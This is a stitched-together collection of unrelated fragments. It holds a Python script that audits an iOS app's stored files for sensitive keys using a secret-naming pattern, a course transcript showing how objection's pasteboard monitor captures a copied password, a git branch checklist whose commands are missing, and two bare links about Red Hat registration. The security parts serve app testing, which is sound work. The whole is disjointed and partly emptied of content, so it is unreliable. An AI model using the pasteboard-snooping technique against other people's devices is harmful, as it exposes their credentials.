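# Heuristic: key/column names that usually hold data which should not sit on disk in clear text.
SENSITIVE = re.compile(r"token|password|passwd|secret|account|card|pin", re.I)

def scan_plist(path: Path) -> list[str]:
    """Return 'file:key' for each top-level plist key with a sensitive-looking name."""
    with open(path, "rb") as f:
        data = plistlib.load(f)  # handles both XML and binary plists
    return [f"{path.name}:{k}" for k in data if SENSITIVE.search(str(k))]

def scan_sqlite(path: Path) -> list[str]:
    """Return 'file:table.column' for sensitive-looking columns in non-empty tables."""
    findings = []
    con = sqlite3.connect(path)
    for (table,) in con.execute("SELECT name FROM sqlite_master WHERE type='table'"):
        rows = con.execute(f'SELECT COUNT(*) FROM "{table}"').fetchone()[0]
        for col in con.execute(f'PRAGMA table_info("{table}")'):
            if rows and SENSITIVE.search(col[1]):  # col[1] is the column name
                findings.append(f"{path.name}:{table}.{col[1]}")
    con.close()
    return findings

def scan_documents(doc_dir: Path) -> list[str]:
    """Dispatch on the file signature (as the file command does), not on the extension."""
    findings = []
    for p in sorted(doc_dir.iterdir()):
        head = p.read_bytes()[:16]
        if head.startswith(b"SQLite format 3\x00"):
            findings.extend(scan_sqlite(p))
        elif head.startswith(b"bplist") or head.startswith(b"<?xml"):
            findings.extend(scan_plist(p))
    return findings

def build_sample_documents(root: Path) -> Path:
    """Constructed stand-in for the app's Documents folder; key names and values are assumptions."""
    root.mkdir(parents=True, exist_ok=True)
    (root / "firstRun.plist").write_bytes(plistlib.dumps({"isFirstRun": False}))
    (root / "userDetails.plist").write_bytes(plistlib.dumps(
        {"username": "securestore", "authToken": "TOKEN-PLACEHOLDER", "isLoggedIn": True}))
    con = sqlite3.connect(root / "bankDetails.db")
    con.execute("CREATE TABLE bank_details (id INTEGER, account_number TEXT, pin TEXT)")
    con.execute("INSERT INTO bank_details VALUES (1, 'ACCT-PLACEHOLDER', '0000')")
    con.commit(); con.close()
    return root

def audit_sample() -> list[str]:
    """Build the constructed Documents folder in a temp dir and audit it."""
    return scan_documents(build_sample_documents(Path(tempfile.mkdtemp()) / "Documents"))
```

Running audit_sample() reports the auth token in userDetails.plist and the account and PIN columns in bankDetails.db, and stays silent on firstRun.plist, which only records that the app has already run.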

//////////////////////////////////////////////////////////////////////
Sensitive data in the UIPasteboard

Now let's see another commonly seen client side issue, which is storing sensitive data in the pasteboard.

So what it means is if you can copy something from your application, it will be stored in the device's

pasteboard.

So let's see how we can test for that.

Let's use objection to start the application.

As you can see, the application has been started.

In objection, we have an option where we can use iOS pasteboard and there is an option to monitor that.

So let's hit enter.

Now let's come back to the application and let's try to save something.

If you look at this, I have just saved something earlier.

It is just showing it here in the output.

Now, let me store something else.

Secure store and let me enter the password here.

And let me just quickly copy this and let me quickly sign in.

Okay.

Now look at that.

The password that I have just copied is pasted here.

So this is something that we can usually find in applications.

If the applications allow the users to copy something into the pasteboard, in this case, this secure store application is allowing the users to copy the passwords into the pasteboard and we managed to retrieve that content from the pasteboard using objection.

We can similarly do this on a non-jailbroken device by launching the application in debug mode and hooking into that by using objection and then running this command iOS Space Pasteboard Space Monitor.

//////////////////////////////////////////////////////////////////////
1. Change to the directory

2. Check that the branch exists

The one marked with an asterisk is main.

3. Switch branches

4. Confirm the switch

5. How to go back one step if you made a mistake
//////////////////////////////////////////////////////////////////////
Red Hat registration does not work properly
https://qiita.com/Yuhkih/items/a976dde5f150aac1ff9a
https://qiita.com/hiroyuki_onodera/items/a3c8e17c4bc01588ac5f
